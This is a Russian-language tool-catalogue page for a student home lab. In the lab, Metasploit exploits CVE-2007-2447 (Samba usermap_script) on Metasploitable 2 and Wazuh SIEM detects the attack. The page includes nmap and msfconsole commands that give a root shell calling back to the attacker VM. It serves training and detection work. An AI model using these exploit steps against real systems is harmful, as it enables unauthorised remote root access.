Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2007-2447-Exploitation-SIEM-Detection-Lab — Изолированная AD/Linux лаборатория атак: эксплуатация CVE-2007-2447 через Metasploit, обнаружение с помощью Wazuh SIEM, сопоставленного с MITRE ATT&CK (T1190, T1059) | Kitploit
Инструменты/GitHubGitHub/harshiys/cve-2007-2447-exploitation-siem-detection-lab
РазведкаФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеРазведка угрозОбнаружение ВторженийОбучение и ОбразованиеАнализ Журналов

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Лаборатории и Практика
GitHubharshiys/cve-2007-2447-exploitation-siem-detection-lab

CVE-2007-2447-Exploitation-SIEM-Detection-Lab

Изолированная AD/Linux лаборатория атак: эксплуатация CVE-2007-2447 через Metasploit, обнаружение с помощью Wazuh SIEM, сопоставленного с MITRE ATT&CK (T1190, T1059)

Репозиторий
1026 дней назадЕщё не проверено
Поделиться

🛡️ Лаборатория эксплуатации CVE-2007-2447 и обнаружения через SIEM (Wazuh + MITRE ATT&CK)

Проект B.Tech (BTP) | IIIT Pune На основе: «Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring» — ICCCNT 2023, IIT Delhi

Полностью функциональная домашняя лаборатория по кибербезопасности, развёрнутая на одной машине с использованием бесплатных инструментов с открытым исходным кодом. Лаборатория имитирует реальный жизненный цикл атаки — разведка → эксплуатация → обнаружение — и демонстрирует, как SIEM может обнаруживать атаки и сопоставлять их с фреймворком MITRE ATT&CK в реальном времени.


📐 Архитектура лаборатории

root@kitploit:~
┌─────────────────────────────────────────────────┐
│           VirtualBox — Internal Network          │
│              (cyberlab, 10.0.0.x/24)             │
│                                                  │
│  ┌──────────┐   ┌──────────────┐   ┌──────────┐ │
│  │  Kali    │   │ Metasploitable│  │  Ubuntu  │ │
│  │ 10.0.0.1 │◄─►│   10.0.0.2   │◄─►│ 10.0.0.3 │ │
│  │ ATTACKER │   │    VICTIM     │  │   SIEM   │ │
│  └──────────┘   └──────────────┘   └──────────┘ │
└─────────────────────────────────────────────────┘
         Host-Only Adapter (192.168.56.103)
         → Wazuh Dashboard access from browser

🧰 Инструменты и технологии


🔧 Руководство по настройке

Предварительные требования

  • Машина как минимум с 16 ГБ ОЗУ (все 3 ВМ работают одновременно)
  • Установленный VirtualBox 7.x
  • ~50 ГБ свободного места на диске

Шаг 1 — Настройка сети в VirtualBox

Создайте внутреннюю сеть с именем cyberlab в VirtualBox. Все три ВМ получают этот адаптер. ВМ Ubuntu/Wazuh получает дополнительный адаптер Host-Only, чтобы вы могли получить доступ к панели управления из браузера.


Шаг 2 — Kali Linux (Атакующий)

  1. Скачайте образ Kali Linux для VirtualBox
  2. Импортируйте и назначьте адаптер внутренней сети cyberlab
  3. Задайте статический IP:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.1
    netmask 255.255.255.0
  1. Перезапустите сеть: sudo systemctl restart networking

Шаг 3 — Metasploitable 2 (Жертва)

  1. Скачайте Metasploitable 2
  2. Импортируйте в VirtualBox и назначьте сеть cyberlab
  3. Задайте статический IP:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.2
    netmask 255.255.255.0

⚠️ Никогда не открывайте Metasploitable 2 в интернет. Он преднамеренно небезопасен.


Шаг 4 — Ubuntu + Wazuh SIEM (Защитник)

  1. Установите Ubuntu Server 22.04
  2. Назначьте два адаптера: внутренний cyberlab + Host-Only
  3. Настройте статический IP через netplan (/etc/netplan/01-network-manager-all.yaml):
root@kitploit:~
network:
  version: 2
  renderer: NetworkManager
  ethernets:
    enp0s3:
      addresses:
        - 10.0.0.3/24
    enp0s8:
      dhcp4: true
  1. Установите Wazuh (одиночный узел):
root@kitploit:~
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
  1. Откройте панель управления по адресу: https://192.168.56.103 (из браузера хоста)

Шаг 5 — Подключение Metasploitable к Wazuh через Syslog

Поскольку Metasploitable 2 не может запускать агент Wazuh, настройте пересылку syslog для мониторинга без агента:

На Metasploitable добавьте в /etc/rsyslog.conf:

root@kitploit:~
*.* @10.0.0.3:514

На Wazuh (Ubuntu) включите ввод syslog в /var/ossec/etc/ossec.conf:

root@kitploit:~
<remote>
  <connection>syslog</connection>
  <port>514</port>
  <protocol>udp</protocol>
</remote>

Перезапустите Wazuh: sudo systemctl restart wazuh-manager


⚔️ Имитация атаки

Фаза 1 — Разведка (Nmap)

root@kitploit:~
# From Kali
nmap -sV -O 10.0.0.2

Ключевые службы, обнаруженные на Metasploitable 2:

Обнаружено 20+ открытых портов. ОС идентифицирована: Linux 2.6.x


Фаза 2 — Эксплуатация (Metasploit)

Уязвимость: CVE-2007-2447 — внедрение команд Samba usermap_script

Позволяет неаутентифицированное удалённое выполнение кода через некорректные MS-RPC-запросы на Samba 3.0.0–3.0.25rc3.

root@kitploit:~
# From Kali — launch Metasploit
msfconsole

# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run

# Verify root access
whoami
# Output: root

Фаза 3 — Обнаружение (Wazuh SIEM)

После эксплуатации Wazuh автоматически обнаружил события и сопоставил их с MITRE ATT&CK:

Всего обнаружено событий: 55+

Откройте панель управления по адресу https://192.168.56.103 → Security Events → MITRE ATT&CK


📊 Ключевые результаты

  • ✅ Успешно воспроизведён полный жизненный цикл атаки в изолированной среде
  • ✅ CVE-2007-2447 позволил получить неаутентифицированный root-шелл за считанные секунды
  • ✅ SIEM Wazuh обнаружил все атаки и сопоставил их с MITRE ATT&CK в реальном времени
  • ✅ Пересылка syslog обеспечила мониторинг устаревшей системы Metasploitable без агента
  • ✅ Вся лаборатория работает на одной хост-машине с 16 ГБ ОЗУ

📁 Структура репозитория

root@kitploit:~
cybersecurity-home-lab/
│
├── README.md                  ← You are here
├── network-config/
│   ├── kali-interfaces.txt    ← Kali static IP config
│   ├── metasploitable-interfaces.txt
│   └── ubuntu-netplan.yaml    ← Ubuntu/SIEM netplan config
├── wazuh-config/
│   └── ossec.conf             ← Wazuh syslog/agent config
├── screenshots/
│   ├── nmap-scan.png
│   ├── metasploit-exploit.png
│   ├── wazuh-dashboard.png
│   └── wazuh-alerts-table.png
└── report/
    └── ICCCNT_2023_paper.pdf  ← Reference research paper

🔗 Ссылка

Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.


⚠️ Отказ от ответственности

Данная лаборатория полностью построена на изолированных виртуальных машинах без доступа в интернет во время имитации атак. Все инструменты и техники используются строго в образовательных целях в контролируемой среде. Не пытайтесь воспроизводить какие-либо техники атак на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


Представлено Harshita Verma | IIIT Pune

Скачать инструмент
ВМРольIPИнструменты
Kali Linux 2026.1Атакующий10.0.0.1Nmap, Metasploit
Metasploitable 2Жертва10.0.0.220+ уязвимостей
Ubuntu 22.04 + WazuhSIEM10.0.0.3Wazuh v4.7.5
ИнструментВерсияНазначение
VirtualBox7.xГипервизор — запускает все ВМ на одном хосте
Kali Linux2026.1ОС для тестирования на проникновение (наступательная)
Metasploitable 2v2.0Преднамеренно уязвимая цель
Wazuhv4.7.5SIEM с открытым исходным кодом (оборонительная)
NmapLatestСканирование сети/портов
Metasploit FrameworkLatestФреймворк для эксплуатации
ПортСлужбаВерсия
21/tcpFTPvsftpd 2.3.4
22/tcpSSHOpenSSH 4.7p1
80/tcpHTTPApache 2.2.8
139/445SMBSamba 3.x–4.x
3306/tcpMySQL5.0.51a
5432/tcpPostgreSQL8.3
Идентификатор правилаОписаниеТехника MITREТактика
5402Успешное выполнение sudo до ROOTT1548.003Повышение привилегий
5501PAM: открыт сеанс входаT1078Первоначальный доступ / Закрепление
5502PAM: закрыт сеанс входаT1078Обход защиты
502Сервер Wazuh запущен—Обнаружение активно